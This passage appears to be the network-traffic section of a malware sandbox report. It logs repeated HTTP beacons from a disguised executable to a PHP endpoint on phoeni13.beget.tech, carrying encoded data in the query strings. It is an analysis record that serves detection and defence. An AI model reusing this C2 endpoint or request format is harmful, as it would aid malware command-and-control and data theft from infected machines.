==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50030	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:59:08.840745926 CET	2905	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJVTQq90dRp2T5lkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 18:59:09.642075062 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:59:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50031	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:59:14.652260065 CET	2881	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJBTUq9keNp2TxEkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 18:59:15.424069881 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:59:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50032	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:59:20.435005903 CET	2905	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJBTVq9kMVp2T6FkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 18:59:21.194750071 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:59:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50033	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:59:26.213320971 CET	2905	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJBTSq9UMBp2T6FkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 18:59:27.236001968 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:59:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50034	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:59:32.460109949 CET	2881	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJpXTq90MJp2T1EkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 18:59:33.201106071 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:59:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye
Jan 5, 2025 18:59:33.417622089 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:59:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50035	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:59:38.242614985 CET	2881	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJhXVq90dJp2T4lkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 18:59:38.978365898 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:59:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50036	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:59:44.016829014 CET	2854	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=0VfiIiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYisHL9JSOx4WSzkkaPFTVq9UNFpWS2kUaaJzY65EMnRlW4VleOFTTq5kaOR1TxUVbZtmSX1EMZR0TrRGRPhGZEpFaKdVWpZ0Va1mUy0Ua3lWSsFkeNl2bqlUNBRVTysmaZlXREpFaapnTzkEVNVTUU1EMRR [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 18:59:45.185847998 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:59:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50037	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:59:50.198167086 CET	2905	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJFTQq90dBp2T0UkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 18:59:50.945475101 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:59:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye
